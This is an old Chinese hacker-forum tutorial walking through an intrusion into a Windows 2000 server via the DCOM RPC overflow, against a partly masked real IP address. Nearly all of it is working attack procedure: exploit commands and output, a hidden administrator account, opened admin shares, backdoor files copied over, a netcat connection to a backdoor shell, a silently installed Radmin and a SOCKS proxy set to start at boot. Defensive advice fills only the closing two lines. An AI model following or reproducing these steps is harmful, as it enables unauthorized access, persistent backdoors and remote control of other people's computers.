一步一步的入侵----only for you

渔歌子

一步一步的入侵----only for you                                              作者：蓝眼泪

? 一步一步的入侵----only for you

（声明：本人菜鸟的一些菜鸟经验，还请大虾指点）

大家好，现在网上很流行dcomrpc，哈哈，那好就说说利用dcomrpc入侵。很入侵之后做的事情

需要的工具：
很好的：?radmin.exe
扫描工具: retinarpcdcom.exe
溢出攻击工具:RpcDcom（通用溢出工具)
脚本开启telnet工具：telnet.vbe opentelnet.exe resumetelnet.exe
代理：sksockserver.exe
后门程序：WinEggDropShellPro3thVersion

好了，该做的都做的差不多了。现在开始把~~

首先使用retinarpcdcom.exe扫描一个网段。查找有rpc漏洞的机子，这个漏洞需要135端口开放，（想必

随便扫一下就会发现有许多主机开放的135端口）。。。。。。

(人走运座着都能检到钱) 211.217.50.xx?第一个主机就被扫出来又此漏洞。开始工作

看看211.217.50.xx有没有其他的漏洞或是若口令之类的.我们可以使用流光扫描一下, 好了..看样子没有
其他的缺陷,主机开了3389端口,我们可以上去看一下是xp版本还是win2k

哈哈，是win2k server版本


展开命令行：

[查看dcomrpc的用法?用法 dcomrpc -d <host> [options]? ]

F:\hack>cd rpc\dcomrpc

RPC DCOM Expl01t coded by .:[oc192.us]:. Security

Complied and Modified by Expl01t www.longker.com

Usage:

dcomrpc -d <host> [options]
Options:
? -d:????Hostname to attack [Required]
? -t:????Type [Default: 0]
? -r:????Return address [Default: Selected from target]
? -p:????Attack port [Default: 135]
? -l:????Bindshell port [Default: 666]

Types:
? 0 [0x0018759f]: [Win2k-Universal]
? 1 [0x0100139d]: [WinXP-Universal]


开始进行溢出：
F:\hack>cd rpc\dcomrpc -d?211.217.50.xx 0

RPC DCOM remote expl01t - .:[oc192.us]:. Security
Complied and recorrected by Expl01t www.longker.com
[+] Resolving host..
[+] Done.
[+] Expl01ting....Just wait......

等到出现，说明溢出成功
c:\winnt\system32>

接着我们建立用户

c:\winnt\system32>net user blueye$ 1111 /add
命令成功完成。

把用户添加成超级管理员
c:\winnt\system32>net localgroup administrators blueye$ /add
命令成功完成。


看看共享开了没有,没有的话把共享开开

c:\winnt\system32>net share
清单是空的。

c:\winnt\system32>net share ipc$
命令成功完成。
c:\winnt\system32>net share admin$
命令成功完成。

到这里我们入侵告一段落


[ 建 立 IPC$ 连 接 ，也可以使用tftp上传 ，先和对方建立连接]

F:\hack>net use \\211.217.50.xx\ipc$ "1111" /user:blueye$

[ 上 传 一 个 后 门 程 序 到 对 方 的 主 机 里]

F:\hack>copy d:\inject.exe \\211.217.50.xx\admin$\system32

F:\hack>copy d:\tback.dll \\211.217.50.xx\admin$\system32

然后运行后门程序，我们可以使用at命令。但是有的机器把at明令禁止了，建议直接开起telnet
使用opentelnet.exe? 关闭开启的telnet使用resumetelnet \\ip user password
如果忘记开共享可以使用脚本开启telnet来开共享，用法:
cscript telnet.vbe ip user password null port? (null是验证方式)

F:\hack>opentenet \\211.217.50.xx blueye$ 1111 1 4567

F:\hack>telnet 211.217.50.xx 4567
省略...

连接并运行后门程序,运行后门程序命令?根目录：inject.exe -run
（后门使用方法和安装都在zip文件里面包含了）

后门端口123456
F:\hack>nc 211.217.50.xx 123456


???????Welcome To WinEggDropShell Matrix Version

[Melody
]#



下面安装radmin

配置好的radmin客户端有4个文件。配置radmin客户端可参考相关文章
radmin.reg
raddrv.dll
admdll.dll
r_server.exe

把这个4个文件copy c:\winnt\system32

在目录下面执行命令
c:\winnt\system32>r_server /s radmin.reg? -----导入注册表

c:\winnt\system32>r_server /install /silence -----安装radmin.并且不显示托盘

c:\winnt\system32>net start r_server?----- 启动服务


可以开启3389的话你自己看着办把，哈哈


安装sock代理
把sksockserver.exe copy c:\winnt\system32

c:\winnt\system32>sksockserver /install?????????-----安装服务

c:\winnt\system32>sksockserver -config port 1234?????----端口定在1234?自己可以改

c:\winnt\system32>sksockserver -config starttype 2????----开机自动启动

c:\winnt\system32>net start skserver??????????? ----启动服务



最后删除共享
net share ipc$ /del
net share admin$ /del




在安装radmin的时候你发现有人已经安装了。。怎么办？走人？--------NO


看操作? (我输入的内容)

后门连接

F:\hack>nc 211.217.50.xx 123456


???????Welcome To WinEggDropShell Matrix Version

[Melody
]#（pslist）

[Melody
]#(pskill r_server)

[Melody
]#(shell)

c:\winnt\system32>(del r_server.exe)

c:\winnt\system32>(del admdll.dll)

c:\winnt\system32>(del raddrv.dll)


copy你自己的上去，然后安装

省事的办法直接导入注册表，然后重新输入安装命令运行，就可以了，只是在原来默认端口上面架上了密

码


等等。。。。为什么我输入导入注册表命令不管用呢？出现什么regedit不是可运行的程序之类的 。

完了，努力白费了。。。。。。。 -----------------------------NO

出现这样的情况最简单的解决办法telnet上去导入试试看，什么？不是把，有没有搞错阿。。。

呵呵，尽管放心，去试试看就知道；还可以先运行radmin 然后在radmin的dos下导入，也是可以的

嗬嗬，去试试看吧


防御办法：
安装rpc补丁
使用防火墙过滤135，445，139等端口


完全菜鸟级别，高手莫见怪，恳求高手指导

QQ：5024786